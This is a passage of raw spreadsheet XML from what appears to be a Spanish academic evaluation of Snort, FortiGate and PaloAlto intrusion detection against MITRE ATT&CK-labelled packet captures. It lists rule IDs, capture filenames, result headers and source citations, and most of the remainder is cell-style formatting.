        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385, 2100459, 2044666, 2051116, 2024510, 2027191</t>
    </r>
  </si>
  <si>
    <t>LEYENDA DETECTABLE POR PATRONES</t>
  </si>
  <si>
    <t>LEYENDA SIDs (TP y FP)</t>
  </si>
  <si>
    <t>LEYENDA ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>False Positive ■</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">True Positive Colateral </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FF6AA84F"/>
      </rPr>
      <t>■</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">True Positive </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color rgb="FFFF0000"/>
      </rPr>
      <t>■</t>
    </r>
  </si>
  <si>
    <t>SI [1]</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas</t>
  </si>
  <si>
    <t>No, salvo circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>No, salvo uso de reglas personalizadas y circunstancias concretas del ataque</t>
  </si>
  <si>
    <t>SID no relacionado con el ataque, evento de red, o legítimo, alerta no válida</t>
  </si>
  <si>
    <t>SID relacionado con otra parte del ataque, no se contabiliza como alerta válida</t>
  </si>
  <si>
    <t>SID relacionado con el ataque, alerta válida</t>
  </si>
  <si>
    <t>En determinadas técnicas, debido a la necesidad de que los flujos se encuentren completos para el análisis con otros cortafuegos como FortiGate o PaloAlto, el establecimiento de conexión no puede omitirse, lo que causa que Snort genere alertas para fases que no constituyen el ataque como tal</t>
  </si>
  <si>
    <t>Fichero pcap</t>
  </si>
  <si>
    <t>Tipo de tráfico</t>
  </si>
  <si>
    <t>Categoría</t>
  </si>
  <si>
    <t>Tamaño real del tráfico</t>
  </si>
  <si>
    <t>Nº de Flujos</t>
  </si>
  <si>
    <t>Nº de Direcciones Distintas</t>
  </si>
  <si>
    <t>SIDs en Tráfico legítimo</t>
  </si>
  <si>
    <t>#SIDs en Tráfico legítimo</t>
  </si>
  <si>
    <t>Contiene Flujos Truncados (Sin SYN)</t>
  </si>
  <si>
    <t>smtp-FIX.pcapng</t>
  </si>
  <si>
    <t>REAL</t>
  </si>
  <si>
    <t>Básico</t>
  </si>
  <si>
    <t>1,9 kB</t>
  </si>
  <si>
    <t>2002749</t>
  </si>
  <si>
    <t>http-FIX.pcapng</t>
  </si>
  <si>
    <t>52,7 kB</t>
  </si>
  <si>
    <t>2002749,2002752,2101620</t>
  </si>
  <si>
    <t>youtube-FIX.pcapng</t>
  </si>
  <si>
    <t>332,7 kB</t>
  </si>
  <si>
    <t>2002749,2002752,2101620,51037</t>
  </si>
  <si>
    <t>01 - DIT (01 - DIT (captura_00001_20240125083640)).pcapng</t>
  </si>
  <si>
    <t>TD</t>
  </si>
  <si>
    <t>100 MB</t>
  </si>
  <si>
    <t>2001219, 2002910, 2002911, 2003068, 2008120, 2010935, 2010937, 2019102, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2001219, 2002749, 2002752, 2002910, 2002911, 2003068, 2008120, 2009207, 2010935, 2010937, 2019102, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2100615, 2100650, 2101384, 2101390, 2101411, 2101417, 2101444, 2101917</t>
  </si>
  <si>
    <t>02 - DIT (02 - DIT (captura_00001_20240202080842)).pcapng</t>
  </si>
  <si>
    <t>3,9 MB</t>
  </si>
  <si>
    <t>2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2100381, 2100384, 2100399, 2100402, 2100408, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>03 - DIT (03 - DIT (captura_00002_20240125191218)).pcapng</t>
  </si>
  <si>
    <t>103 MB</t>
  </si>
  <si>
    <t>2019102, 2100366, 2100476, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2100366, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100476, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>04 - DIT (04 - DIT (captura_00003_20240126181602)).pcapng</t>
  </si>
  <si>
    <t>109 MB</t>
  </si>
  <si>
    <t>2019102, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2100381, 2100382, 2100384, 2100385, 2100399, 2100402, 2100404, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>05 - DIT (05 - DIT (captura_00004_20240128151951)).pcapng</t>
  </si>
  <si>
    <t>107 MB</t>
  </si>
  <si>
    <t>2019102, 2027397, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2027397, 2036751, 2100381, 2100384, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>06 - DIT (06 - DIT (captura_00005_20240130061546)).pcapng</t>
  </si>
  <si>
    <t>106 MB</t>
  </si>
  <si>
    <t>2009967, 2019102, 2027397, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2008470, 2009205, 2009206, 2009207, 2009208, 2009582, 2009967, 2019102, 2027397, 2100381, 2100384, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>07 - DIT (07 - DIT (captura_00006_20240131165021)).pcapng</t>
  </si>
  <si>
    <t>48 MB</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2008470, 2009206, 2009207, 2009208, 2019102, 2027397, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>TOTAL</t>
  </si>
  <si>
    <t>2001219,2002910,2002911,2003068,2008120,2010935,2010937,2019102,2101384,2101411,2100366,2100476,2027397,2009967</t>
  </si>
  <si>
    <t>51037,2001219,2002910,2002911,2003068,2008120,2010935,2010937,2019102,2101384,2101411,2100366,2100476,2027397,2009967</t>
  </si>
  <si>
    <t>2002749,2002752,2101620,51037,2001117,2001219,2002910,2002911,2003068,2008120,2009207,2010935,2010937,2019102,2100381,2100384,2100385,2100399,2100402,2100408,2100469,2100472,2100527,2100615,2100650,2101384,2101390,2101411,2101417,2101444,2101917,2009582,2100366,2100476,2100382,2100404,2036751,2008470,2009205,2009206,2009208,2009967,2027397</t>
  </si>
  <si>
    <t>Paquetes Reglas (Nº único de reglas)</t>
  </si>
  <si>
    <t>Técnicas que generan Alertas (TP)</t>
  </si>
  <si>
    <t>Ataques que generan Alertas (TP)</t>
  </si>
  <si>
    <t>Alertas totales (SIDs)</t>
  </si>
  <si>
    <t>Alertas promedio (SIDs) por ataque</t>
  </si>
  <si>
    <t>Community</t>
  </si>
  <si>
    <t>Táctica</t>
  </si>
  <si>
    <t>TOTAL TÉCNICAS</t>
  </si>
  <si>
    <t>TOTAL ATAQUES</t>
  </si>
  <si>
    <t>TOTAL SIDS</t>
  </si>
  <si>
    <t>TOTAL TÉCNICAS CON ALERTA</t>
  </si>
  <si>
    <t>TOTAL ATAQUES CON ALERTA</t>
  </si>
  <si>
    <t>TOTAL ALERTAS</t>
  </si>
  <si>
    <t>TOTAL TÉCNICAS SIN ALERTA</t>
  </si>
  <si>
    <t>TOTAL ATAQUES SIN ALERTA</t>
  </si>
  <si>
    <t>PORCENTAJE RESPECTO A TOTAL</t>
  </si>
  <si>
    <t>PORCENTAJE TÉCNICAS CON ALERTA</t>
  </si>
  <si>
    <t>PORCENTAJE CON ALERTA</t>
  </si>
  <si>
    <t>PORCENTAJE TÉCNICAS SIN ALERTA</t>
  </si>
  <si>
    <t>PORCENTAJE SIN ALERTA</t>
  </si>
  <si>
    <t>TP totales (SIDs)</t>
  </si>
  <si>
    <t>Efectividad SIDs (Nº de TP / Alertas totales)</t>
  </si>
  <si>
    <t>TOTAL TP</t>
  </si>
  <si>
    <t>PORCENTAJE TP RESPECTO A TOTAL</t>
  </si>
  <si>
    <t>PORCENTAJE FP RESPECTO A TOTAL</t>
  </si>
  <si>
    <t xml:space="preserve">PORCENTAJE TP RESPECTO A TOTAL </t>
  </si>
  <si>
    <t xml:space="preserve">PORCENTAJE FP RESPECTO A TOTAL </t>
  </si>
  <si>
    <t>RESULTADOS POR ATAQUES INDIVIDUALES</t>
  </si>
  <si>
    <t>RESULTADOS POR TÁCTICAS</t>
  </si>
  <si>
    <t>RESULTADOS POR TÉCNICAS</t>
  </si>
  <si>
    <t>TOTAL (INSTANCIAS)</t>
  </si>
  <si>
    <t>TOTAL USADOS PARA ANÁLISIS (INSTANCIAS)</t>
  </si>
  <si>
    <t>Nº DE INSTANCIAS DE ATAQUE PRINCIPAL</t>
  </si>
  <si>
    <t>Nº INSTANCIAS PRINCIPALES DETECTADAS SNORT</t>
  </si>
  <si>
    <t>% DETECCIÓN SNORT (RS4)</t>
  </si>
  <si>
    <t>Nº INSTANCIAS PRINCIPALES DETECTADAS RS1</t>
  </si>
  <si>
    <t>% DETECCIÓN RS1</t>
  </si>
  <si>
    <t>Nº INSTANCIAS PRINCIPALES DETECTADAS RS2</t>
  </si>
  <si>
    <t>% DETECCIÓN RS2</t>
  </si>
  <si>
    <t>Nº INSTANCIAS PRINCIPALES DETECTADAS RS3</t>
  </si>
  <si>
    <t>% DETECCIÓN RS3</t>
  </si>
  <si>
    <t>Nº INSTANCIAS PRINCIPALES DETECTADAS FG</t>
  </si>
  <si>
    <t>% DETECCIÓN FG</t>
  </si>
  <si>
    <t>% DETECCIÓN SNORT</t>
  </si>
  <si>
    <t>T1595.002.pcapng</t>
  </si>
  <si>
    <t>T1596.001.pcapng</t>
  </si>
  <si>
    <t>T1586.001_[2].pcapng</t>
  </si>
  <si>
    <t>TOTAL USADOS PARA ANÁLISIS (ATAQUES)</t>
  </si>
  <si>
    <t>Nº DE ATAQUES IMPLEMENTADOS</t>
  </si>
  <si>
    <t>T1542.005.pcapng</t>
  </si>
  <si>
    <t>T1505.001.pcapng</t>
  </si>
  <si>
    <t>T1503.005.pcapng</t>
  </si>
  <si>
    <t>T1110.001.pcapng</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication_[5].pcapng, T1187-Forced_Authentication2_[5].pcapng</t>
  </si>
  <si>
    <t>T1602.001.pcapng</t>
  </si>
  <si>
    <t>T1213.pcapng</t>
  </si>
  <si>
    <t>T1565.001.pcapng</t>
  </si>
  <si>
    <t>T1499.001.pcapng</t>
  </si>
  <si>
    <t>T1496.pcapng</t>
  </si>
  <si>
    <t>BALANCE</t>
  </si>
  <si>
    <t>T1219-RemoteAccessSoftwareLocal_[5].pcapng, T1219-RemoteAccessSoftwareNAT_[5].pcapng</t>
  </si>
  <si>
    <t>T1571.pcapng</t>
  </si>
  <si>
    <t>T1205.001.pcapng</t>
  </si>
  <si>
    <t>T1218.010.pcapng</t>
  </si>
  <si>
    <t>T1599-NBB1_[5].pcapng, T1599-NBB2_[5].pcapng</t>
  </si>
  <si>
    <t>T1612-BuildImageOnHostLocal_[5].pcapng, T1612-BuildImageOnHostNAT_[5].pcapng</t>
  </si>
  <si>
    <t>T1030.pcapng</t>
  </si>
  <si>
    <t>T1204.001.pcapng</t>
  </si>
  <si>
    <t>T1047.pcapng</t>
  </si>
  <si>
    <t>TOTAL INSTANCIAS</t>
  </si>
  <si>
    <t>TOTAL INSTANCIAS DETECTADAS SNORT</t>
  </si>
  <si>
    <t>TOTAL INSTANCIAS DETECTADAS RS1</t>
  </si>
  <si>
    <t>TOTAL INSTANCIAS DETECTADAS RS2</t>
  </si>
  <si>
    <t>TOTAL INSTANCIAS DETECTADAS RS3</t>
  </si>
  <si>
    <t>TOTAL INSTANCIAS DETECTADAS FG</t>
  </si>
  <si>
    <t>DETECTADOS</t>
  </si>
  <si>
    <t>NO DETECTADOS</t>
  </si>
  <si>
    <t>Alertas totales (attackids)</t>
  </si>
  <si>
    <t>Alertas promedio (attackids) por Ataque</t>
  </si>
  <si>
    <t>Efectividad de Alertas (Nº de TP / Alertas Totales)</t>
  </si>
  <si>
    <t>LEYENDA PROCEDENCIA DE PCAPS (Manual [n])</t>
  </si>
  <si>
    <t>Referencia</t>
  </si>
  <si>
    <t>Título</t>
  </si>
  <si>
    <t>Autor</t>
  </si>
  <si>
    <t>URL Acceso</t>
  </si>
  <si>
    <t>Seguridad en conmutadores de red y puntos de acceso. Clasificación y realización práctica de ataques</t>
  </si>
  <si>
    <t>Javier García Clavero</t>
  </si>
  <si>
    <t>https://idus.us.es/bitstream/handle/11441/159132/TFG4947_Garc%C3%ADaClavero.pdf?sequence=2&amp;isAllowed=y</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red del IDS Snort bajo la matriz MITRE ATT&amp;CK mediante Caldera</t>
  </si>
  <si>
    <t>Javier Fructuoso Martín</t>
  </si>
  <si>
    <t>https://idus.us.es/handle/11441/143609</t>
  </si>
  <si>
    <t>Detección en fase temprana de ciberataques con rastro en red</t>
  </si>
  <si>
    <t>Andrés García Coronado</t>
  </si>
  <si>
    <t>https://biblus.us.es/bibing/proyectos/abreproy/94340/fichero/TFG-4340+GARC%C3%8DA+CORONADO%2C+ANDR%C3%89S.pdf</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red mediante los IDS Snort y FortiGate</t>
  </si>
  <si>
    <t>Javier García Borja</t>
  </si>
  <si>
    <t>Análisis de la capacidad de detección de ataques en red mediante los IDS Snort y PaloAlto</t>
  </si>
  <si>
    <t>Alejandro Moreno Pérez</t>
  </si>
  <si>
    <t>Dataset-CIC-2018</t>
  </si>
  <si>
    <t>UNB - CIC</t>
  </si>
  <si>
    <t>https://www.unb.ca/cic/datasets/ids-2018.html</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
</sst>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43">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font/>
    <font>
      <b/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF6AA84F"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF6AA84F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="7"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <strike/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="26.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <sz val="15.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
  </fonts>
  <fills count="17">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor rgb="FFFFF2CC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFE599"/>
        <bgColor rgb="FFFFE599"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFD966"/>
        <bgColor rgb="FFFFD966"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF1C232"/>
        <bgColor rgb="FFF1C232"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4A86E8"/>
        <bgColor rgb="FF4A86E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE6E6E6"/>
        <bgColor rgb="FFE6E6E6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDAF1F3"/>
        <bgColor rgb="FFDAF1F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D9D9"/>
        <bgColor rgb="FFD9D9D9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF9FC5E8"/>
        <bgColor rgb="FF9FC5E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEFEFEF"/>
        <bgColor rgb="FFEFEFEF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB6D7A8"/>
        <bgColor rgb="FFB6D7A8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFCCCCCC"/>
        <bgColor rgb="FFCCCCCC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF3F3F3"/>
        <bgColor rgb="FFF3F3F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF6D01"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9E7FD"/>
        <bgColor rgb="FFD9E7FD"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="26">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s>
  <cellStyleXfs count="1">
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" applyAlignment="1" applyFont="1"/>
  </cellStyleXfs>
  <cellXfs count="32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horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="3" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="4" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="5" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="6" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="7" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="1" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="1" numFmtId="164" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="2" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="3" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="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2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="5" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="4" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="1" numFmtId="164" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="2" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="4" fontId="4" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="6" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="1" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="2" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="13" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="14" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="12" fillId="3" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="4" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="5" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="6" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
